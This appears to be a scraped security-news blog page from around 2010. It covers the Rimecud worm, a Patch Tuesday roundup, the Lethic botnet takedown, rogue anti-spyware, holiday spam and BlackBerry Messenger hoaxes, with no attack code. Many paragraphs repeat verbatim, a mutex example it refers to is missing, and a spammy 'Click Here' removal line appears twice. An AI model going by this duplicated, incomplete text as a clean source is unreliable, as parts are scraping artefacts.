Win32/Rimecud is a family of worms that spreads via fixed and removable drives, instant messaging programs, and P2P networks. Similar to Hamweq, it also contains backdoor functionality that allows unauthorized access to affected machines. However, compared to Hamweq, Win32/Rimecud's backdoor supports a more diverse and sophisticated set of commands, giving the remote attacker greater control of the compromised machine.
Win32/Rimecud uses a variety of obfuscators to hinder detection. These are written in C/C++/Delphi/Visual Basic and usually have virtual environment detection and anti-emulation tricks to make the malware harder to detect.
Other similarities to Win32/Hamweq's behavior include using the Recycle Bin as the target drop folder for copies of itself, injecting code into the explorer.exe process and the capability to spread via removable drives.
By looking at the similarities between the two threats we could speculate that they were created by the same author(s). Like they say: "Birds of a feather".
Plenty of Updates on Patch Tuesday
This Black Tuesday was different as anticipated – Microsoft releases only one security bulletin, but other companies “jumped in” and deliver updates now as well.
For the windows operating systems, only one Security Bulletin was released. MS10-001 deals with a vulnerability in the decompression routines of the Embeded OpenType Font Engine. This means that especially in Windows 2000, programs like Internet Explorer, Word or PowerPoint for example which render EOT fonts can put the system at risk when viewing manipulated contents. In newer operating systems the flawed code is used differently so that Microsoft assumes that it isn’t exploitable there.
The company released another Security Advidory on the Adobe FlashPlayer that is installed by default on Windows XP. Due to security vulnerabilities in that version attackers may inject malicious code and compromise the computers. Microsoft advises users and administrators to either uninstall or update the software. Current versions are available on Adobes web site.
Adobe also released updated versions of Reader and Acrobat. They close security holes in the popular software which is already publicly exploited. The updated Reader software is available here, while for Acrobat updates are available here.
On a side note, also Oracle released Critical Patch Updates (CPU) for several of it’s database products.
As all updates deal with critical security vulnerabilities, users are advised to install them as soon as possible. Administrators should start their tests immediately so they can roll out the fixed software ASAP, too, as some of those vulnerabilities already get exploited by cyber criminals.
The company released another Security Advidory on the Adobe FlashPlayer that is installed by default on Windows XP. Due to security vulnerabilities in that version attackers may inject malicious code and compromise the computers. Microsoft advises users and administrators to either uninstall or update the software. Current versions are available on Adobes web site.
On a side note, also Oracle released Critical Patch Updates (CPU) for several of it’s database products.
As all updates deal with critical security vulnerabilities, users are advised to install them as soon as possible. Administrators should start their tests immediately so they can roll out the fixed software ASAP, too, as some of those vulnerabilities already get exploited by cyber criminals.
Lethic gone: another botnet bites the dust
The Darkreading.com site is reporting that researchers with communications security firm Neustar, of Sterling, Va., working with ISPs has taken over the command-and-control servers and shut down the Lethic botnet. The owners of the Lethic network specialized in diploma, pharmaceutical and replica spam. It is believed that Lethic was responsible for 10 percent of spam.
Other recent botnet takedowns include:
-- McColo (Nov. 08),
-- Torpig (May 09),
-- MegaD (Nov. 09)
Story here.
SysDefenders
SysDefenders is the latest addition to the clones of the WiniGuard rogue anti-spyware family.
if your computer is infected above malware, you should remove it soon, Click Here to learn how to remove it soon.
if your computer is infected above malware, you should remove it soon, Click Here to learn how to remove it soon.
It's Nice To Get Noticed
Looking at a random new incoming malware sample in F-Secure sample automation systems. Notice the Mutex names it uses:
Hey STFU yourself, why don't you?
P.S. It's detected as Email-Worm:MSIL/Agent.MXK
Hey STFU yourself, why don't you?
P.S. It's detected as Email-Worm:MSIL/Agent.MXK
Busy time for spammers during winter holidays
The spammers and malware authors profited of the holiday time when a lot of people are at home and sent a large amount of emails just before the official free days. As can be seen in the graphic below, we registered a higher activity in the two days before the holidays and immediately after them. The red bars are either weekend days or holidays (25.12 and 1.1).
What kind of spam was sent?
A lot of meds spam, fake products and a lot of malware carried as attachment in different forms:
Conclusions
Sadly, we see that a lot of spam was sent during business hours. This means that there are a lot of computers in companies which are infected and are part of a botnet. Even if we see that a lot more spam was sent in the evening, this actually represents the peak hours in the USA (23h in Germany is 17h on the Est coast and 14h on West coast). Of course, we cannot say that all the spam is originating from USA, but many reports have shown that it is the biggest source of sending spam and hosting malicious files and websites.
What kind of spam was sent?
A lot of meds spam, fake products and a lot of malware carried as attachment in different forms:
- Pictures or news about Angelina Jolie
- News about Barack Obama
- Outlook Web Access password reset
- Post packet tracking
- Greeting cards
- Flash Exploits
- others
Conclusions
Sadly, we see that a lot of spam was sent during business hours. This means that there are a lot of computers in companies which are infected and are part of a botnet. Even if we see that a lot more spam was sent in the evening, this actually represents the peak hours in the USA (23h in Germany is 17h on the Est coast and 14h on West coast). Of course, we cannot say that all the spam is originating from USA, but many reports have shown that it is the biggest source of sending spam and hosting malicious files and websites.
BlackBerry Messenger the new vehicle to distribute Hoaxes?
I received an interesting IM from a friend via BlackBerry Messenger [BBM] this weekend. She was worried that it could do damage to her shiny new BlackBerry and, as she knew I work for [a security company], she forwarded it to me for my opinion.
As soon as I read it, I knew it was a hoax and told her just to delete it.
It didn’t really surprise me that these Hoaxes are now being spread via BBM as the devices are becoming increasingly popular. I’m sure all of you have received the usual one via E-mail about a Virus which burns the whole hard disc C of your computer , well now I believe you will be seeing them on your BlackBerry.
I don’t want to take the usual route of blaming Social Networks sites but I believe they are the cause for this new wave of Hoaxes. The problem with Social Networks is that it enables almost anyone to be able to add you on several different IM’s by just visiting your page if you do not set your privacy settings correctly.
The new BBM also enables you to add new users by taking a picture of a barcode which is uniquely created for your BlackBerry pin. This makes it incredibly easy for people who you don’t know to add you to their contact list, which leaves you open to receiving more Hoaxes or Spam messages.
I have personally seen lots of these barcodes on several Social networks and forums and warn those who read this blog not to do the same and only share their PIN with contacts they trust.
Users should be careful who they accept as contacts, as you may start to see a lot more of these Hoaxes or even Spam in your BBM inbox.
As soon as I read it, I knew it was a hoax and told her just to delete it.
It didn’t really surprise me that these Hoaxes are now being spread via BBM as the devices are becoming increasingly popular. I’m sure all of you have received the usual one via E-mail about a Virus which burns the whole hard disc C of your computer , well now I believe you will be seeing them on your BlackBerry.
I don’t want to take the usual route of blaming Social Networks sites but I believe they are the cause for this new wave of Hoaxes. The problem with Social Networks is that it enables almost anyone to be able to add you on several different IM’s by just visiting your page if you do not set your privacy settings correctly.
The new BBM also enables you to add new users by taking a picture of a barcode which is uniquely created for your BlackBerry pin. This makes it incredibly easy for people who you don’t know to add you to their contact list, which leaves you open to receiving more Hoaxes or Spam messages.
I have personally seen lots of these barcodes on several Social networks and forums and warn those who read this blog not to do the same and only share their PIN with contacts they trust.
Users should be careful who they accept as contacts, as you may start to see a lot more of these Hoaxes or even Spam in your BBM inbox.
Subscribe to:
Posts (Atom)